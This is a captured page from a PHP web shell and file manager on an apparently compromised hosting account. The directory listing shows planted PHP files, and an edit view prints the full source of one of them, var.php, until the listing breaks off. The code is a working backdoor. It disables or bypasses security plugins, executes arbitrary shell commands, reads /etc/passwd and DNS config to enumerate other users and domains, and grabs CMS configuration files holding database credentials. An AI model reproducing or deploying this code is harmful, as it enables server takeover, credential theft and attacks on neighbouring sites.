ACIL FM
Dark
Refresh
Current DIR:
/home/fastexsh/public_html
/
home
fastexsh
public_html
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
cgi-bin
-
chmod
Open
Rename
Delete
exchange
-
chmod
Open
Rename
Delete
pbm_config
-
chmod
Open
Rename
Delete
soodino
-
chmod
Open
Rename
Delete
tether
-
chmod
Open
Rename
Delete
.ftpquota
12 B
chmod
View
DL
Edit
Rename
Delete
.htaccess
281 B
chmod
View
DL
Edit
Rename
Delete
acil.php
171.42 MB
chmod
View
DL
Edit
Rename
Delete
admins.php
62.68 MB
chmod
View
DL
Edit
Rename
Delete
Backup_fastexIR_bot.php
23.49 MB
chmod
View
DL
Edit
Rename
Delete
error_log
914 B
chmod
View
DL
Edit
Rename
Delete
kromo.php
13.05 MB
chmod
View
DL
Edit
Rename
Delete
term.php
140 B
chmod
View
DL
Edit
Rename
Delete
var.php
165.79 MB
chmod
View
DL
Edit
Rename
Delete
wp-default.php
0 B
chmod
View
DL
Edit
Rename
Delete
wp-footer.php
27.72 MB
chmod
View
DL
Edit
Rename
Delete
wp.php
33.07 MB
chmod
View
DL
Edit
Rename
Delete
Edit file: /home/fastexsh/public_html/var.php
<!DOCTYPE html> <html lang="id" data-bs-theme="dark"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons/font/bootstrap-icons.css" rel="stylesheet"> <title>Dashboard - <?php echo $_SERVER['HTTP_HOST']; ?></title> <style> :root { --primary-color: #0d6efd; --secondary-color: #6c757d; --success-color: #198754; --danger-color: #dc3545; --warning-color: #ffc107; --info-color: #0dcaf0; --dark-bg: #121212; --darker-bg: #0a0a0a; --card-bg: #1e1e1e; --border-color: #333; } body { background-color: var(--dark-bg); color: #e0e0e0; font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif; } .card { background-color: var(--card-bg); border: 1px solid var(--border-color); border-radius: 10px; box-shadow: 0 4px 6px rgba(0, 0, 0, 0.3); } .table-dark { --bs-table-bg: var(--card-bg); --bs-table-striped-bg: #2c2c2c; --bs-table-hover-bg: #363636; } .btn-group-sm .btn { border-radius: 6px; } .nav-tabs .nav-link { color: #ccc; border: 1px solid transparent; } .nav-tabs .nav-link.active { background-color: var(--card-bg); border-color: var(--border-color); color: var(--primary-color); font-weight: bold; } .status-badge { padding: 4px 10px; border-radius: 20px; font-size: 0.85em; font-weight: 500; } .status-on { background-color: rgba(25, 135, 84, 0.2); color: #20c997; border: 1px solid rgba(25, 135, 84, 0.3); } .status-off { background-color: rgba(220, 53, 69, 0.2); color: #ff6b6b; border: 1px solid rgba(220, 53, 69, 0.3); } .file-icon { font-size: 1.2em; margin-right: 8px; } .folder-icon { color: #ffc107; } .file-icon-file { color: #6ea8fe; } .terminal-output { background-color: #1a1a1a; color: #00ff00; font-family: 'Consolas', 'Monaco', monospace; border: 1px solid #333; border-radius: 8px; padding: 15px; max-height: 400px; overflow-y: auto; } @media (max-width: 768px) { .btn-group { flex-wrap: wrap; } .btn-group .btn { margin-bottom: 5px; } .table-responsive { font-size: 0.9em; } } .breadcrumb { background-color: var(--card-bg); border-radius: 8px; padding: 10px 15px; } .breadcrumb-item a { color: #6ea8fe; text-decoration: none; } .breadcrumb-item.active { color: #ccc; } .home-dirs { background: var(--darker-bg); border-radius: 8px; padding: 10px; margin-bottom: 15px; } .home-dirs .dir-item { display: inline-block; margin: 5px; padding: 8px 12px; background: var(--card-bg); border-radius: 6px; border: 1px solid var(--border-color); } .config-badge { font-size: 0.75em; padding: 2px 6px; margin-left: 5px; } .domain-list { max-height: 300px; overflow-y: auto; } </style> </head> <body class="py-4"> <div class="container-fluid"> <?php error_reporting(0); session_start(); ob_start(); $filename = __FILE__; $file_name = basename($filename); @chmod($filename, 0444); // Security bypass headers if (function_exists('litespeed_request_headers')) { $a = litespeed_request_headers(); if (isset($a['X-LSCACHE'])) { header('X-LSCACHE: off'); } } if (defined('WORDFENCE_VERSION')) { define('WORDFENCE_DISABLE_LIVE_TRAFFIC', true); define('WORDFENCE_DISABLE_FILE_MODS', true); } if (function_exists('imunify360_request_headers') && defined('IMUNIFY360_VERSION')) { $a = imunify360_request_headers(); if (isset($a['X-Imunify360-Request'])) { header('X-Imunify360-Request: bypass'); } if (isset($a['X-Imunify360-Captcha-Bypass'])) { header('X-Imunify360-Captcha-Bypass: ' . $a['X-Imunify360-Captcha-Bypass']); } } if (function_exists('apache_request_headers')) { $a = apache_request_headers(); if (isset($a['X-Mod-Security'])) { header('X-Mod-Security: ' . $a['X-Mod-Security']); } } if (isset($_SERVER['HTTP_CF_CONNECTING_IP']) && defined('CLOUDFLARE_VERSION')) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_CF_CONNECTING_IP']; if (isset($a['HTTP_CF_VISITOR'])) { header('HTTP_CF_VISITOR: ' . $a['HTTP_CF_VISITOR']); } } // ========== FUNGSI BARU YANG DITAMBAHKAN ========== // Fungsi untuk mendapatkan home directory berdasarkan user function getHomeDirectory($user = null) { if ($user === null) { if (function_exists('posix_getpwuid')) { $userInfo = posix_getpwuid(posix_geteuid()); $user = $userInfo['name']; } else { $user = get_current_user(); } } // Coba berbagai kemungkinan path home $possiblePaths = [ "/home/{$user}", "/home/{$user}/public_html", "/var/www/html/{$user}", "/usr/home/{$user}", "/Users/{$user}", // Untuk macOS "C:/Users/{$user}", // Untuk Windows "C:/xampp/htdocs/{$user}", "C:/wamp64/www/{$user}", dirname(__FILE__) // Fallback ke directory saat ini ]; foreach ($possiblePaths as $path) { if (is_dir($path) && is_readable($path)) { return $path; } } return dirname(__FILE__); // Fallback ke directory saat ini } // Fungsi untuk Jumping (HSphere, vHosts) - DIPERBAIKI function jumpToPath($type, $user = null) { $paths = []; switch($type) { case 'hsphere': $paths = [ "/home/{$user}/public_html", "/var/www/vhosts/{$user}/httpdocs", "/var/www/html/{$user}", "C:/hsphere/local/home/{$user}/public_html", "/hsphere/local/home/{$user}" ]; break; case 'vhost': $paths = [ "/etc/apache2/sites-available", "/etc/httpd/conf.d", "/usr/local/apache2/conf", "C:/xampp/apache/conf/extra", "C:/wamp64/bin/apache/apache2.4.41/conf/extra" ]; break; case 'vhosts_vhost': $paths = [ "/etc/apache2/sites-available", "/var/www/vhosts", "/home/{$user}/public_html", "/usr/local/etc/apache2/Vhosts" ]; break; } foreach ($paths as $path) { if (is_dir($path) && is_readable($path)) { return $path; } } return false; } // Fungsi untuk Grab Config (mengambil konfigurasi) - DIPERBAIKI function grabConfig($type, $source = null, $target = null) { $configFiles = []; switch($type) { case 'vhosts': $configFiles = [ '/etc/apache2/sites-available', '/etc/httpd/conf/httpd.conf', '/usr/local/apache2/conf/httpd.conf', 'C:/xampp/apache/conf/httpd.conf', 'C:/wamp64/bin/apache/apache2.4.41/conf/httpd.conf' ]; break; case 'hsphere': $configFiles = [ '/etc/hsphere/hsphere.properties', '/usr/local/hsphere/shared/config', 'C:/hsphere/shared/config' ]; break; case 'cms': // Konfigurasi CMS populer $cmsConfigs = [ 'vBulletin' => ['includes/config.php'], 'WordPress' => ['wp-config.php'], 'Joomla' => ['configuration.php'], 'WHMCS' => ['configuration.php'], 'Lokomedia' => ['conf/configuration.php'], 'Drupal' => ['sites/default/settings.php'], 'Magento' => ['app/etc/local.xml', 'app/etc/env.php'], 'PrestaShop' => ['config/settings.inc.php'], 'OpenCart' => ['config.php', 'admin/config.php'], 'Laravel' => ['.env', 'config/app.php'] ]; return $cmsConfigs; } $foundConfigs = []; foreach ($configFiles as $file) { if (is_readable($file)) { if (is_dir($file)) { // Jika berupa direktori, scan isinya $files = recursiveScan($file, ['conf', 'config', 'properties', 'ini', 'xml']); $foundConfigs = array_merge($foundConfigs, $files); } elseif (is_file($file)) { $foundConfigs[] = $file; } } } return $foundConfigs; } // Fungsi untuk mendeteksi CMS function detectCMS($directory) { $cmsConfigs = grabConfig('cms'); $detected = []; foreach ($cmsConfigs as $cms => $configs) { foreach ($configs as $config) { $configPath = $directory . '/' . $config; if (file_exists($configPath) && is_readable($configPath)) { $detected[$cms] = $configPath; break; } } } return $detected; } // Fungsi recursive directory scan tanpa shell commands function recursiveScan($directory, $extensions = [], $maxDepth = 10, $currentDepth = 0) { if ($currentDepth >= $maxDepth) { return []; } $files = []; if (!is_dir($directory) || !is_readable($directory)) { return $files; } try { $items = scandir($directory); foreach ($items as $item) { if ($item == '.' || $item == '..') continue; $path = $directory . '/' . $item; if (is_dir($path)) { // Recursive untuk subdirectory $subFiles = recursiveScan($path, $extensions, $maxDepth, $currentDepth + 1); $files = array_merge($files, $subFiles); } elseif (is_file($path) && is_readable($path)) { // Filter berdasarkan ekstensi jika diberikan if (empty($extensions)) { $files[] = $path; } else { $ext = pathinfo($path, PATHINFO_EXTENSION); if (in_array(strtolower($ext), $extensions)) { $files[] = $path; } } } } } catch (Exception $e) { // Silent error } return $files; } // Fungsi untuk membaca /etc/passwd function readEtcPasswd() { $users = []; if (is_readable('/etc/passwd')) { $passwd = file_get_contents('/etc/passwd'); if (preg_match_all('/([^:]+):x:/', $passwd, $matches)) { $users = $matches[1]; } } return $users; } // Fungsi untuk mencari user directories function findUserDirectories($pattern = null) { $users = readEtcPasswd(); $userDirs = []; foreach ($users as $user) { $possiblePaths = [ "/home/{$user}/public_html", "/home/{$user}", "/var/www/{$user}", "/usr/home/{$user}", "/hsphere/local/home/{$user}" ]; foreach ($possiblePaths as $path) { if (is_dir($path) && is_readable($path)) { if ($pattern === null || preg_match($pattern, $path)) { $userDirs[$user] = $path; break; } } } } return $userDirs; } // Fungsi untuk membaca domain dari named.conf function readDomainsFromNamedConf() { $domains = []; if (is_readable('/etc/named.conf')) { $namedConf = file_get_contents('/etc/named.conf'); if (preg_match_all('#/var/named/(.*?)\.db#', $namedConf, $matches)) { $domains = $matches[1]; } } return $domains; } // Fungsi untuk membaca domain dari valiases function readDomainsFromValiases($user) { $domains = []; $valiasesPath = "/etc/valiases/{$user}"; if (is_readable($valiasesPath)) { $content = file_get_contents($valiasesPath); if (preg_match_all('/\S+/', $content, $matches)) { $domains = $matches[0]; } } return $domains; } // Fungsi write file dengan berbagai metode function writeFile($file, $content, $mode = 'w') { // Coba menggunakan file_put_contents if (function_exists('file_put_contents')) { $result = @file_put_contents($file, $content); if ($result !== false) { return true; } } // Coba menggunakan fopen + fwrite if (function_exists('fopen') && function_exists('fwrite')) { $handle = @fopen($file, $mode); if ($handle) { $result = @fwrite($handle, $content); @fclose($handle); return $result !== false; } } return false; } // Fungsi read file dengan berbagai metode function readFileContent($file) { // Coba menggunakan file_get_contents if (function_exists('file_get_contents') && is_readable($file)) { $content = @file_get_contents($file); if ($content !== false) { return $content; } } // Coba menggunakan fopen + fread if (function_exists('fopen') && function_exists('fread') && is_readable($file)) { $handle = @fopen($file, 'r'); if ($handle) { $content = ''; while (!feof($handle)) { $content .= @fread($handle, 8192); } @fclose($handle); return $content; } } // Coba menggunakan highlight_file (untuk file PHP) if (function_exists('highlight_file') && is_readable($file)) { ob_start(); @highlight_file($file); $content = ob_get_clean(); if ($content) { return $content; } } return false; } // Fungsi copy dengan fallback function copyFile($source, $destination) { if (function_exists('copy')) { return @copy($source, $destination); } // Fallback manual copy if (is_readable($source)) { $content = readFileContent($source); if ($content !== false) { return writeFile($destination, $content); } } return false; } // Fungsi unarchive (extract) file function unarchiveFile($archiveFile, $extractTo = null) { if (!is_file($archiveFile) || !is_readable($archiveFile)) { return false; } if ($extractTo === null) { $extractTo = dirname($archiveFile); } $ext = strtolower(pathinfo($archiveFile, PATHINFO_EXTENSION)); // Cek ekstensi yang didukung $supported = ['zip', 'tar', 'gz', 'bz2', 'rar']; if (!in_array($ext, $supported)) { return false; } // Coba menggunakan ZipArchive untuk .zip if ($ext == 'zip' && class_exists('ZipArchive')) { $zip = new ZipArchive(); if ($zip->open($archiveFile) === TRUE) { $result = $zip->extractTo($extractTo); $zip->close(); return $result; } } // Coba menggunakan PharData untuk .tar, .tar.gz, .tar.bz2 if (($ext == 'tar' || $ext == 'gz' || $ext == 'bz2') && class_exists('PharData')) { try { $phar = new PharData($archiveFile); $phar->extractTo($extractTo); return true; } catch (Exception $e) { return false; } } // Coba menggunakan shell commands sebagai fallback if (function_exists('shell_exec')) { $cmd = ''; if ($ext == 'zip') { $cmd = "unzip -q '{$archiveFile}' -d '{$extractTo}' 2>/dev/null"; } elseif ($ext == 'tar') { $cmd = "tar -xf '{$archiveFile}' -C '{$extractTo}' 2>/dev/null"; } elseif ($ext == 'gz') { $cmd = "tar -xzf '{$archiveFile}' -C '{$extractTo}' 2>/dev/null"; } elseif ($ext == 'bz2') { $cmd = "tar -xjf '{$archiveFile}' -C '{$extractTo}' 2>/dev/null"; } elseif ($ext == 'rar') { $cmd = "unrar x '{$archiveFile}' '{$extractTo}/' 2>/dev/null"; } if ($cmd) { @shell_exec($cmd); return is_dir($extractTo); } } return false; } // Fungsi untuk menampilkan syntax highlighting function highlightFileContent($file) { if (!is_file($file) || !is_readable($file)) { return false; } $ext = strtolower(pathinfo($file, PATHINFO_EXTENSION)); // Hanya file yang bisa di-highlight $highlightable = ['php', 'html', 'htm', 'js', 'css', 'txt', 'json', 'xml', 'sql', 'conf', 'config']; if (!in_array($ext, $highlightable)) { return htmlspecialchars(readFileContent($file)); } // Coba menggunakan highlight_file untuk PHP if ($ext == 'php' && function_exists('highlight_file')) { ob_start(); @highlight_file($file); return ob_get_clean(); } // Untuk file lainnya, gunakan highlight_string atau manual highlighting $content = readFileContent($file); if ($content === false) { return false; } $content = htmlspecialchars($content); // Manual highlighting sederhana berdasarkan tipe file switch($ext) { case 'html': case 'htm': $content = preg_replace('/<(\/?)([a-zA-Z][a-zA-Z0-9]*)/', '<<span class="text-primary">$1$2</span>', $content); $content = preg_replace('/<!--(.*?)-->/', '<<span class="text-success">!--$1--</span>>', $content); break; case 'js': $keywords = ['function', 'var', 'let', 'const', 'if', 'else', 'for', 'while', 'return', 'true', 'false', 'null', 'undefined']; foreach ($keywords as $keyword) { $content = preg_replace('/\b' . $keyword . '\b/', '<span class="text-warning">' . $keyword . '</span>', $content); } break; case 'css': $content = preg_replace('/([^{}]+)\{/', '<span class="text-primary">$1</span>{', $content); $content = preg_replace('/\b([a-zA-Z-]+)\s*:/', '<span class="text-success">$1</span>:', $content); break; case 'conf': case 'config': $content = preg_replace('/^(\s*)([a-zA-Z_][a-zA-Z0-9_]*)\s*=/m', '$1<span class="text-warning">$2</span> =', $content); break; } return '<pre class="bg-dark text-light p-3 rounded" style="max-height: 500px; overflow: auto;">' . $content . '</pre>'; } // Fungsi untuk mendeteksi file archive di direktori function detectArchiveFiles($directory) { $archiveExtensions = ['zip', 'tar', 'gz', 'bz2', 'rar', '7z', 'tgz', 'tbz2']; $archives = []; if (!is_dir($directory) || !is_readable($directory)) { return $archives; } $items = @scandir($directory); if (!$items) return $archives; foreach ($items as $item) { if ($item == '.' || $item == '..') continue; $path = $directory . '/' . $item; if (is_file($path)) { $ext = strtolower(pathinfo($item, PATHINFO_EXTENSION)); if (in_array($ext, $archiveExtensions)) { $size = formatSize($path); $archives[] = [ 'name' => $item, 'path' => $path, 'size' => $size, 'ext' => $ext ]; } } } return $archives; } // Fungsi bing search (simulasi) function bing($query) { $query = urlencode($query); $url = "https://www.bing.com/search?q={$query}&count=50"; $ch = curl_init(); curl_setopt_array($ch, [ CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' ]); $html = curl_exec($ch); curl_close($ch); if (!$html) return ''; preg_match_all('/<a href="https?:\/\/([^\/"\'<> ]+)/i', $html, $matches); $domains = []; if (!empty($matches[1])) { foreach ($matches[1] as $host) { $host = strtolower($host); $host = preg_replace('/^www\./', '', $host); if (!in_array($host, $domains)) { $domains[] = $host; } } } return implode("\n", $domains); } // ========== FUNGSI LAMA ========== function detectOS() { if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { return "Windows"; } else { return "Linux"; } } function formatSize($file) { if (!file_exists($file) || !is_readable($file)) return 'N/A'; $bytes = filesize($file); if ($bytes == 0) return '0 B'; $sizes = ['B', 'KB', 'MB', 'GB', 'TB']; $factor = floor((strlen($bytes) - 1) / 3); return sprintf("%.2f", $bytes / pow(1024, $factor)) . " " . $sizes[$factor]; } function exe($cmd) { if(is_file($cmd)) { $buff = @file_get_contents($cmd); return htmlspecialchars($buff); } if(function_exists('system')) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return htmlspecialchars($buff); } elseif(function_exists('exec')) { @exec($cmd,$results); $buff = ""; foreach($results as $result) { $buff .= $result; } return htmlspecialchars($buff); } elseif(function_exists('passthru')) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('shell_exec')) { $buff = @shell_exec($cmd); return htmlspecialchars($buff); } return false; } function deleteDirectory($dir) { if (!is_dir($dir)) return false; $files = array_diff(scandir($dir), array('.', '..')); foreach ($files as $file) { $filePath = "$dir/$file"; is_dir($filePath) ? deleteDirectory($filePath) : unlink($filePath); } return rmdir($dir); } function w($dir,$perm) { if(!is_writable($dir)) { return '<span class="badge bg-danger">'.$perm.'</span>'; } else { return '<span class="badge bg-success">'.$perm.'</span>'; } } function r($dir,$perm) { if(!is_readable($dir)) { return '<span class="badge bg-danger">'.$perm.'</span>'; } else { return '<span class="badge bg-success">'.$perm.'</span>'; } } function perms($file){ $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { $info = 'p'; } else { $info = 'u'; } $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } function hdd($s) { if($s >= 1073741824) return sprintf('%1.2f',$s / 1073741824 ).' GB'; elseif($s >= 1048576) return sprintf('%1.2f',$s / 1048576 ) .' MB'; elseif($s >= 1024) return sprintf('%1.2f',$s / 1024 ) .' KB'; else return $s .' B'; } if(isset($_GET['dir'])) { $dir = $_GET['dir']; @chdir($dir); } else { $dir = getcwd(); } function checkStatus($condition) { return $condition ? '<span class="status-badge status-on">ON</span>' : '<span class="status-badge status-off">OFF</span>'; } function getMyIP() { $ch = curl_init('https://api64.ipify.org'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $ip = curl_exec($ch); curl_close($ch); return $ip ? $ip : 'Tidak Diketahui'; } $os = detectOS(); $kernel = php_uname(); $server_ip = gethostbyname($_SERVER['HTTP_HOST']); $ip_user = getMyIP(); $dir = str_replace("\\","/",$dir); $scdir = explode("/", $dir); $freespace = hdd(disk_free_space("/")); $total = hdd(disk_total_space("/")); $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? '<span class="status-badge status-off">ON</span>' : '<span class="status-badge status-on">OFF</span>'; $ds = @ini_get("disable_functions"); $curl = (function_exists('curl_version')) ? '<span class="status-badge status-on">ON</span>' : '<span class="status-badge status-off">OFF</span>'; $wget = (exe('wget --help')) ? '<span class="status-badge status-on">ON</span>' : '<span class="status-badge status-off">OFF</span>'; $perl = (exe('perl --help')) ? '<span class="status-badge status-on">ON</span>' : '<span class="status-badge status-off">OFF</span>'; $python = (exe('python --help')) ? '<span class="status-badge status-on">ON</span>' : '<span class="status-badge status-off">OFF</span>'; $show_ds = (!empty($ds)) ? $ds: "NONE"; if(!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } // ========== PENAMBAHAN TAB BARU ========== $additional_tabs = [ 'home' => '<i class="bi bi-house-door"></i> Home', 'fileops' => '<i class="bi bi-files"></i> File Operations', 'jumping' => '<i class="bi bi-box-arrow-in-right"></i> Jumping', 'grab' => '<i class="bi bi-download"></i> Grab Config', 'scan' => '<i class="bi bi-search"></i> Recursive Scan', 'archive' => '<i class="bi bi-file-zip"></i> Archive Tools' ]; // Header Section echo '<div class="card mb-4"> <div class="card-header bg-dark"> <div class="d-flex justify-content-between align-items-center"> <h4 class="mb-0"><i class="bi bi-terminal-fill me-2"></i>Server Dashboard</h4> <span class="badge bg-info">'.$_SERVER['HTTP_HOST'].'</span> </div> </div> <div class="card-body"> <div class="row g-3"> <div class="col-md-6"> <div class="d-flex align-items-center mb-2"> <i class="bi bi-pc-display me-2 text-primary"></i> <strong>OS:</strong> <span class="ms-2">'.$os.'</span> </div> <div class="d-flex align-items-center mb-2"> <i class="bi bi-server me-2 text-primary"></i> <strong>Server IP:</strong> <span class="ms-2">'.$server_ip.'</span> </div> <div class="d-flex align-items-center mb-2"> <i class="bi bi-person-circle me-2 text-primary"></i> <strong>User:</strong> <span class="ms-2">'.$user.'</span> </div> </div> <div class="col-md-6"> <div class="d-flex align-items-center mb-2"> <i class="bi bi-hdd me-2 text-success"></i> <strong>Free Space:</strong> <span class="ms-2">'.$freespace.' / '.$total.'</span> </div> <div class="d-flex align-items-center mb-2"> <i class="bi bi-shield-check me-2 text-warning"></i> <strong>Safe Mode:</strong> <span class="ms-2">'.$sm.'</span> </div> <div class="d-flex align-items-center mb-2"> <i class="bi bi-globe me-2 text-info"></i> <strong>Your IP:</strong> <span class="ms-2">'.$_SERVER['REMOTE_ADDR'].'</span> </div> </div> </div> </div> </div>'; // Navigation Tabs echo '<div class="card mb-4"> <div class="card-body p-2"> <ul class="nav nav-tabs nav-fill" id="dashboardTab" role="tablist"> <li class="nav-item" role="presentation"> <a href="'.basename($_SERVER['PHP_SELF']).'?dir='.$dir.'" class="nav-link '.(!isset($_GET['do'])?'active':'').'"> <i class="bi bi-folder2-open"></i> File Manager </a> </li> <li class="nav-item" role="presentation"> <a href="?dir='.$dir.'&do=home" class="nav-link '.($_GET['do']=='home'?'active':'').'"> <i class="bi bi-house-door"></i> Home </a> </li> <li class="nav-item" role="presentation"> <a href="?dir='.$dir.'&do=system" class="nav-link '.($_GET['do']=='system'?'active':'').'"> <i class="bi bi-info-circle"></i> System Info </a> </li> <li class="nav-item" role="presentation"> <a href="?dir='.$dir.'&do=fileops" class="nav-link '.($_GET['do']=='fileops'?'active':'').'"> <i class="bi bi-files"></i> File Operations </a> </li> <li class="nav-item" role="presentation"> <a href="?dir='.$dir.'&do=upload" class="nav-link '.($_GET['do']=='upload'?'active':'').'"> <i class="bi bi-upload"></i> Upload </a> </li> <li class="nav-item" role="presentation"> <a href="?dir='.$dir.'&do=cmd" class="nav-link '.($_GET['do']=='cmd'?'active':'').'"> <i class="bi bi-terminal"></i> Terminal </a> </li>'; // Tambahkan tab tambahan foreach ($additional_tabs as $tab_key => $tab_name) { if (!in_array($tab_key, ['home', 'fileops'])) { echo '<li class="nav-item" role="presentation"> <a href="?dir='.$dir.'&do='.$tab_key.'" class="nav-link '.($_GET['do']==$tab_key?'active':'').'"> '.$tab_name.' </a> </li>'; } } echo '<li class="nav-item"> <a href="?logout=true" class="nav-link text-danger"> <i class="bi bi-box-arrow-right"></i> Logout </a> </li> </ul> </div> </div>'; // ========== PENANGANAN TAB BARU ========== // Tab Home - DIPERBAIKI (Default current dir + Common Directories) if($_GET['do'] == 'home') { echo '<div class="card mb-4"> <div class="card-header bg-dark"> <h5 class="mb-0"><i class="bi bi-house-door me-2"></i>Home Directory & Common Directories</h5> </div> <div class="card-body">'; // Current Directory Info echo '<div class="alert alert-primary"> <i class="bi bi-folder me-2"></i> <strong>Current Directory:</strong> '.$dir.'<br> <strong>Permissions:</strong> '.w($dir, perms($dir)).' </div>'; // Current Directory Contents echo '<div class="row"> <div class="col-md-6"> <div class="card h-100"> <div class="card-header bg-secondary"> <i class="bi bi-folder me-2"></i>Current Directory Contents </div> <div class="card-body">'; if(is_dir($dir) && is_readable($dir)) { $items = @scandir($dir); if($items) { echo '<div class="list-group">'; $count = 0; foreach($items as $item) { if($item == '.' || $item == '..') continue; $count++; if($count > 20) { echo '<div class="list-group-item bg-dark text-light"> <i class="bi bi-three-dots me-2"></i>... and more </div>'; break; } $full_path = $dir . '/' . $item; $is_dir = is_dir($full_path); $icon = $is_dir ? 'bi-folder-fill text-warning' : 'bi-file-earmark text-info'; $size = $is_dir ? '<span class="badge bg-warning">DIR</span>' : '<span class="badge bg-secondary">'.formatSize($full_path).'</span>'; echo '<div class="list-group-item bg-dark text-light"> <div class="d-flex justify-content-between align-items-center"> <div> <i class="bi '.$icon.' me-2"></i> '.htmlspecialchars($item).' </div> <div> '.($is_dir ? '<a href="?dir='.urlencode($full_path).'" class="btn btn-sm btn-outline-primary" title="Open Directory"> <i class="bi bi-box-arrow-in-right"></i> </a>' : '<a href="?act=view&dir='.urlencode($dir).'&file='.urlencode($full_path).'" class="btn btn-sm btn-outline-info" title="View File"> <i class="bi bi-eye"></i> </a>' ).' '.$size.' </div> </div> </div>'; } echo '</div>'; // Show total count $total_items = count($items) - 2; // subtract . and .. echo '<div class="mt-2 text-center"> <small class="text-muted">Showing '.min(20, $total_items).' of '.$total_items.' items</small> </div>'; } else { echo '<div class="alert alert-warning"> <i class="bi bi-exclamation-triangle me-2"></i> Cannot scan directory </div>'; } } else { echo '<div class="alert alert-warning"> <i class="bi bi-exclamation-triangle me-2"></i> Cannot read current directory </div>'; } echo '</div></div></div>'; // Common Directories echo '<div class="col-md-6"> <div class="card h-100"> <div class="card-header bg-secondary"> <i class="bi bi-folder-symlink me-2"></i>Common Directories </div> <div class="card-body"> <div class="mb-3"> <input type="text" id="searchDirs" class="form-control bg-dark text-light" placeholder="Search directories..." onkeyup="filterDirectories()"> </div>'; $common_dirs = [ '/' => ['Root Directory', 'bi-hdd'], '/home' => ['Home Directory', 'bi-house-door'], '/home/'.$user => ['User Home', 'bi-person'], '/home/'.$user.'/public_html' => ['Public HTML', 'bi-globe'], '/var/www/html' => ['Apache Root', 'bi-server'], '/var/www' => ['Web Directory', 'bi-folder'], '/tmp' => ['Temp Directory', 'bi-clock'], '/etc' => ['System Configuration', 'bi-gear'], '/usr/local' => ['Local Programs', 'bi-terminal'], '/opt' => ['Optional Software', 'bi-box'], '/root' => ['Root Home', 'bi-person-check'], '/proc' => ['Process Info', 'bi-diagram-3'], '/sys' => ['System Info', 'bi-cpu'], '/dev' => ['Device Files', 'bi-device-hdd'], '/mnt' => ['Mount Points', 'bi-usb-drive'], '/media' => ['Removable Media', 'bi-usb-plug'], '/srv' => ['Service Data', 'bi-hdd-stack'], '/boot' => ['Boot Files', 'bi-power'], '/lib' => ['System Libraries', 'bi-book'], '/bin' => ['System Binaries', 'bi-terminal'], '/sbin' => ['System Admin Binaries', 'bi-terminal-fill'], '/usr/bin' => ['User Binaries', 'bi-terminal'], '/usr/sbin' => ['User Admin Binaries', 'bi-terminal-fill'], '/usr/local/bin' => ['Local User Binaries', 'bi-terminal'], '/usr/local/sbin' => ['Local Admin Binaries', 'bi-terminal-fill'], '/var/log' => ['Log Files', 'bi-journal-text'], '/var/tmp' => ['Variable Temp', 'bi-clock-history'], '/var/run' => ['Runtime Data', 'bi-play-circle'], '/var/lock' => ['Lock Files', 'bi-lock'], '/var/spool' => ['Spool Directory', 'bi-printer'], '/var/mail' => ['Mail Directory', 'bi-envelope'], '/var/cache' => ['Cache Files', 'bi-lightning'] ]; echo '<div class="list-group domain-list" id="dirList">'; foreach($common_dirs as $path => $dir_info) { list($desc, $icon_class) = $dir_info; if(is_dir($path) && is_readable($path)) { // Get directory info $item_count = 0; $size_info = 'DIR'; if($handle = @opendir($path)) { while(false !== ($entry = readdir($handle))) { if($entry != '.' && $entry != '..') { $item_count++; } } closedir($handle); } $permissions = perms($path); $writable = is_writable($path); $perm_badge = $writable ? '<span class="badge bg-success ms-1">W</span>' : '<span class="badge bg-danger ms-1">R</span>'; echo '<a href="?dir='.urlencode($path).'" class="list-group-item list-group-item-action bg-dark text-success dir-item"> <div class="d-flex justify-content-between align-items-center"> <div> <i class="bi '.$icon_class.' me-2"></i> <strong>'.$desc.'</strong> '.$perm_badge.' </div> <div> <span class="badge bg-info">'.$item_count.' items</span> </div> </div> <div class="d-flex justify-content-between align-items-center mt-1"> <small class="text-muted"> <i class="bi bi-folder me-1"></i>'.$path.' </small> <small class="text-muted"> <i class="bi bi-shield me-1"></i>'.$permissions.' </small> </div> </a>'; } else { echo '<div class="list-group-item bg-dark text-secondary dir-item"> <div class="d-flex justify-content-between align-items-center"> <div> <i class="bi '.$icon_class.' me-2"></i> <strong>'.$desc.'</strong> <span class="badge 